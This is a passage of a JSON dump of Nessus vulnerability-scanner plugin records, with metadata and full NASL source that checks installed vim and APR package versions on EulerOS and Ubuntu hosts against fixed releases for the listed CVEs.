value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:vim-X11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:vim-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:vim-enhanced\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:vim-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:vim-minimal\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP8\");\n\nvar sp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(8)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP8\");\n\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP8\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"vim-X11-8.1.450-1.h11.eulerosv2r8\",\n \"vim-common-8.1.450-1.h11.eulerosv2r8\",\n \"vim-enhanced-8.1.450-1.h11.eulerosv2r8\",\n \"vim-filesystem-8.1.450-1.h11.eulerosv2r8\",\n \"vim-minimal-8.1.450-1.h11.eulerosv2r8\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"8\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"vim\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-27T15:15:09", "description": "The remote Ubuntu 16.04 LTS / 21.04 host has packages installed that are affected by a vulnerability as referenced in the USN-5056-1 advisory.\n\n - An out-of-bounds array read in the apr_time_exp*() functions was fixed in the Apache Portable Runtime 1.6.3 release (CVE-2017-12613). The fix for this issue was not carried forward to the APR 1.7.x branch, and hence version 1.7.0 regressed compared to 1.6.3 and is vulnerable to the same issue. (CVE-2021-35940)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-08-31T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 ESM : APR vulnerability (USN-5056-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12613", "CVE-2021-35940"], "modified": "2023-10-23T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04:-:esm", "p-cpe:/a:canonical:ubuntu_linux:libapr1", "p-cpe:/a:canonical:ubuntu_linux:libapr1-dev"], "id": "UBUNTU_USN-5056-1.NASL", "href": "https://www.tenable.com/plugins/nessus/152918", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-5056-1. The text\n# itself is copyright (C) Canonical, Inc. See\n# <https://ubuntu.com/security/notices>. Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152918);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/23\");\n\n script_cve_id(\"CVE-2021-35940\");\n script_xref(name:\"USN\", value:\"5056-1\");\n\n script_name(english:\"Ubuntu 16.04 ESM : APR vulnerability (USN-5056-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 16.04 LTS / 21.04 host has packages installed that are affected by a vulnerability as referenced in\nthe USN-5056-1 advisory.\n\n - An out-of-bounds array read in the apr_time_exp*() functions was fixed in the Apache Portable Runtime\n 1.6.3 release (CVE-2017-12613). The fix for this issue was not carried forward to the APR 1.7.x branch,\n and hence version 1.7.0 regressed compared to 1.6.3 and is vulnerable to the same issue. (CVE-2021-35940)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-5056-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected libapr1 and / or libapr1-dev packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-35940\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04:-:esm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapr1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapr1-dev\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2021-2023 Canonical, Inc. / NASL script (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/Ubuntu/release');\nif ( isnull(os_release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nos_release = chomp(os_release);\nif (! ('16.04' >< os_release)) audit(AUDIT_OS_NOT, 'Ubuntu 16.04', 'Ubuntu ' + os_release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar pkgs = [\n {'osver': '16.04', 'pkgname': 'libapr1', 'pkgver': '1.5.2-3ubuntu0.1~esm1'},\n {'osver': '16.04', 'pkgname': 'libapr1-dev', 'pkgver': '1.5.2-3ubuntu0.1~esm1'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var osver = NULL;\n var pkgname = NULL;\n var pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'libapr1 / libapr1-dev');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-18T15:18:23", "description": "According to the versions of the vim packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - vim is vulnerable to Heap-based Buffer Overflow (CVE-2021-3872, CVE-2021-3875, CVE-2021-3903, CVE-2021-3927)\n\n - vim is vulnerable to Use of Uninitialized Variable (CVE-2021-3928)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2022-01-28T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP9 : vim (EulerOS-SA-2022-1040)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3872", "CVE-2021-3875", "CVE-2021-3903", "CVE-2021-3927", "CVE-2021-3928"], "modified": "2023-11-17T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:vim-common", "p-cpe:/a:huawei:euleros:vim-enhanced", "p-cpe:/a:huawei:euleros:vim-filesystem", "p-cpe:/a:huawei:euleros:vim-minimal", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2022-1040.NASL", "href": "https://www.tenable.com/plugins/nessus/157185", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(157185);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/17\");\n\n script_cve_id(\n \"CVE-2021-3872\",\n \"CVE-2021-3875\",\n \"CVE-2021-3903\",\n \"CVE-2021-3927\",\n \"CVE-2021-3928\"\n );\n\n script_name(english:\"EulerOS 2.0 SP9 : vim (EulerOS-SA-2022-1040)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the vim packages installed, the EulerOS installation on the remote host is affected by the\nfollowing vulnerabilities :\n\n - vim is vulnerable to Heap-based Buffer Overflow (CVE-2021-3872, CVE-2021-3875, CVE-2021-3903,\n CVE-2021-3927)\n\n - vim is vulnerable to Use of Uninitialized Variable (CVE-2021-3928)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2022-1040\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?beec72b3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected vim packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3927\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-3928\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/10/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:vim-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:vim-enhanced\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:vim-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:vim-minimal\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\");\n\nvar sp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(9)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\");\n\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"vim-common-8.2-1.h5.r5.eulerosv2r9\",\n \"vim-enhanced-8.2-1.h5.r5.eulerosv2r9\",\n \"vim-filesystem-8.2-1.h5.r5.eulerosv2r9\",\n \"vim-minimal-8.2-1.h5.r5.eulerosv2r9\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"9\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"vim\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-18T15:18:53", "description": "According to the versions of the vim packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - vim is vulnerable to Heap-based Buffer Overflow (CVE-2021-3872, CVE-2021-3875, CVE-2021-3903, CVE-2021-3927)\n\n - vim is vulnerable to Use of Uninitialized Variable (CVE-2021-3928)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2022-01-28T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP9 : vim (EulerOS-SA-2022-1020)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3872", "CVE-2021-3875", "CVE-2021-3903", "CVE-2021-3927", "CVE-2021-3928"], "modified": "2023-11-17T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:vim-common", "p-cpe:/a:huawei:euleros:vim-enhanced", "p-cpe:/a:huawei:euleros:vim-filesystem", "p-cpe:/a:huawei:euleros:vim-minimal", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2022-1020.NASL", "href": "https://www.tenable.com/plugins/nessus/157195", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(157195);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/17\");\n\n script_cve_id(\n \"CVE-2021-3872\",\n \"CVE-2021-3875\",\n \"CVE-2021-3903\",\n \"CVE-2021-3927\",\n \"CVE-2021-3928\"\n );\n\n script_name(english:\"EulerOS 2.0 SP9 : vim (EulerOS-SA-2022-1020)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the vim packages installed, the EulerOS installation on the remote host is affected by the\nfollowing vulnerabilities :\n\n - vim is vulnerable to Heap-based Buffer Overflow (CVE-2021-3872, CVE-2021-3875, CVE-2021-3903,\n CVE-2021-3927)\n\n - vim is vulnerable to Use of Uninitialized Variable (CVE-2021-3928)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2022-1020\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59939db1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected vim packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3927\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-3928\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/10/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:vim-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:vim-enhanced\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:vim-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:vim-minimal\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\");\n\nvar sp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(9)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\");\n\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"vim-common-8.2-1.h5.r5.eulerosv2r9\",\n \"vim-enhanced-8.2-1.h5.r5.eulerosv2r9\",\n \"vim-filesystem-8.2-1.h5.r5.eulerosv2r9\",\n \"vim-minimal-8.2-1.h5.r5.eulerosv2r9\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"9\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"vim\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:36:49", "description": "According to the versions of the apr package installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities :\n\n - An out-of-bounds array read in the apr_time_exp*() functions was fixed in the Apache Portable Runtime 1.6.3 release (CVE-2017-12613). The fix for this issue was not carried forward to the APR 1.7.x branch, and hence version 1.7.0 regressed compared to 1.6.3 and is vulnerable to the same issue. (CVE-2021-35940)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2021-12-29T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 3.0.2.0 : apr (EulerOS-SA-2021-2848)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12613", "CVE-2021-35940"], "modified": "2021-12-29T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:apr", "cpe:/o:huawei:euleros:uvp:3.0.2.0"], "id": "EULEROS_SA-2021-2848.NASL", "href": "https://www.tenable.com/plugins/nessus/156348", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156348);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/12/29\");\n\n script_cve_id(\"CVE-2021-35940\");\n\n script_name(english:\"EulerOS Virtualization 3.0.2.0 : apr (EulerOS-SA-2021-2848)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the apr package installed, the EulerOS Virtualization installation on the remote host is\naffected by the following vulnerabilities :\n\n - An out-of-bounds array read in the apr_time_exp*() functions was fixed in the Apache Portable Runtime\n 1.6.3 release (CVE-2017-12613). The fix for this issue was not carried forward to the APR 1.7.x branch,\n and hence version 1.7.0 regressed compared to 1.6.3 and is vulnerable to the same issue. (CVE-2021-35940)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-2848\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?739624b2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected apr packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-35940\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:apr\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.2.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.2.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"apr-1.4.8-3.1\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apr\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-27T19:47:48", "description": "VMware Cloud Director Appliance contains an authentication bypass vulnerability in case VMware 